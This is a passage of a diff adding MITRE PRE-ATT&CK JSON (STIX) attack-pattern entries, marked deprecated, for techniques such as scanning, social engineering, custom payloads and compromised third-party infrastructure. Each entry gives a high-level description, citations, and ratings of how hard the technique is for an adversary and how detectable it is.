infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1312", + "external_id": "T1312" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1089", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "created": "2017-12-14T16:46:06.044Z", + "modified": "2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1111", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_detectable_by_common_defenses": "No", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1334", + "external_id": "T1334" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1334).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "name": "Compromise 3rd party infrastructure to support delivery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5a68c603-d7f9-4535-927e-ab56819eaa85", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party or closed-source vulnerability/exploit information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).\n\nThere is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1354", + "external_id": "T1354" + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1131", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Finding, attacking, and compromising a 3rd party or closed vulnerability entity is challenging, because those containing the vulnerabilities should be very aware of attacks on their environments have a heightened awareness.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The compromise of unknown vulnerabilities would provide little attack and warning against a defender, rendering it highly challenging to detect.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise of externally facing system", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nExternally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1388", + "url": "https://attack.mitre.org/techniques/T1388" + }, + { + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017.", + "source_name": "CylanceOpCleaver" + }, + { + "description": "Jason Mick. (2011, July 12). AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsanto. Retrieved March 9, 2017.", + "source_name": "DailyTechAntiSec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:16:12.162Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1165", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "DMZ environments are specifically designed to be isolated because one assumes they will ultimately be compromised by the adversary.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Most DMZs are monitored but are also designed so that if they are compromised, the damage/risk is limited.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--7f2d3da6-7e34-44a3-9e7f-905455339726", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct active scanning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1254).\n\nActive scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1254", + "external_id": "T1254" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This technique is an expected and voluminous activity when on the Internet. Active scanning techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. The high volume of this activity makes it burdensome for any defender to chase and therefore often ignored.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various available tools and data sources for scouting and detecting address, routing, version numbers, patch levels, protocols/services running, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1031", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct cost/benefit analysis", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).\n\nLeadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)", + "external_references": [ + { + "external_id": "T1226", + "url": "https://attack.mitre.org/techniques/T1226", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017.", + "source_name": "KIT-Herring" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1003", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a7c620e5-cbc9-41b2-9695-418ef560f16c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct passive scanning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1253).\n\nPassive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1253", + "external_id": "T1253" + }, + { + "source_name": "SurveyDetectionStrategies", + "description": "Jamal Raiyn. (2014). A survey of Cyber Attack Detection Strategies. Retrieved March 5, 2017." + }, + { + "source_name": "CyberReconPaper", + "description": "H. P. Sanghvi and M. S. Dahiya. (2013, February). Cyber Reconnaissance: An Alarm before Cyber Attack. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Generates no network traffic that would enable detection.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to do but it requires a vantage point conducive to accessing this data.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1030", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1279).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1279", + "external_id": "T1279" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1056", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1268).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1268", + "external_id": "T1268" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1045", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1249", + "external_id": "T1249" + }, + { + "source_name": "SEAttackVectors", + "description": "Mathew J. Schwartz. (2011, September 14). Social Engineering Leads APT Attack Vectors. Retrieved March 5, 2017." + }, + { + "source_name": "BeachSE2003", + "description": "Gary Beach. (2003, October 1). Kevin Mitnick on Social Engineering Hackers. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting technical information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1026", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b79a1960-d0be-4b51-bb62-b27e91e1dea0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct social engineering or HUMINT operation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nSocial Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1376", + "url": "https://attack.mitre.org/techniques/T1376" + }, + { + "description": "Chris Johnston. (2015, February 5). Company loses $17m in email scam. Retrieved March 9, 2017.", + "source_name": "17millionScam" + }, + { + "description": "Robert Hackett. (2015, August 10). Fraudsters duped this company into handing over $40 million. Retrieved March 9, 2017.", + "source_name": "UbiquityEmailScam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:16:46.619Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1153", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Assuming an average adversary whose focus is social engineering, it is not difficult for an adversary. Assuming a HUMINT operation and specialized circumstances, the adversary difficulty becomes 1. Social engineering can be easily done remotely via email or phone. In contrast, HUMINT operations typically would require physical contact at some point in the process, increasing the difficulty.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Assuming an average company does not train its employees to be aware of social engineering techniques, it is not possible to detect the adversary's use unless a highly motivated or paranoid employee informs security. This assessment flips to a 1 in cases of environments where security trains employees to be vigilant or in specialized industries where competitive intelligence and business intelligence train employees to be highly aware. Most likely more complex for an adversary to detect as methods move to physical or non traditionally monitored mechanisms (such as phone calls outside of call centers). Furthermore, the content of such an interaction may be lost due to lack of collection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--f4c5d1d9-8f0e-46f1-a9fa-f9a440926046", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confirmation of launched compromise achieved", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nUpon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1383", + "url": "https://attack.mitre.org/techniques/T1383" + }, + { + "description": "carlota. (2014, November 12). Stages of a Malware Infection. Retrieved April 1, 2017.", + "source_name": "FireEye Malware Stages" + }, + { + "description": "Nart Villeneuve and James Bennett. (2012). Detecting APT Activity with Network Traffic Analysis. Retrieved March 9, 2017.", + "source_name": "APTNetworkTrafficAnalysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:17:12.000Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1160", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Certainty of the confirmation of compromise is not guaranteed unless the adversary sees communication to a command and control server, exfiltration of data, or an intended effect occur.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Current commercial tools and sensitive analytics can be used to detect communications to command and control servers or data exfiltration.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--a425598d-7c19-40f7-9aa3-ac20f0d5c2b2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create backup infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1339).\n\nBackup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1339", + "external_id": "T1339" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be obvious to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], commercial storage solutions).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1116", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create custom payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).\n\nA payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1345", + "external_id": "T1345" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is likely that an adversary will create and develop payloads on inaccessible or unknown networks for OPSEC reasons.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Specialized tools exist for research, development, and testing of virus/malware payloads.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1122", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b355817c-cf63-43b4-94a4-05e9645fa910", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create implementation plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).\n\nImplementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1232", + "external_id": "T1232" + }, + { + "source_name": "ChinaCollectionPlan", + "description": "Thomas B Inglis. (1946, December 31). COLLECTION PLAN TO IMPLEMENT NATIONAL INTELLIGENCE REQUIREMENTS FOR CHINA. Retrieved March 2, 2017." + }, + { + "source_name": "OrderOfBattle", + "description": "Wikipedia contributors. (2016, November 20). Order of battle. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1009", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create infected removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).\n\nUse of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1355", + "external_id": "T1355" + }, + { + "source_name": "BadUSB", + "description": "Security Research labs. (n.d.). BadUSB Exposure. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1132", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create strategic plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).\n\nStrategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1231", + "external_id": "T1231" + }, + { + "source_name": "KPMGChina5Year", + "description": "KPMG. (2016, October 19). China\u2019s 13th Five-Year Plan signals a potential new era of Sino-foreign cooperation, finds KPMG report. Retrieved March 2, 2017." + }, + { + "source_name": "China5YearPlans", + "description": "Wikipedia contributors. (2017, February 8). Five-year plans of China. Retrieved March 2, 2017." + 